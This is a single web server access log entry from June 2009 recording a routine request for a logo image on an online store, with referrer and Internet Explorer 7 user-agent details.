70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
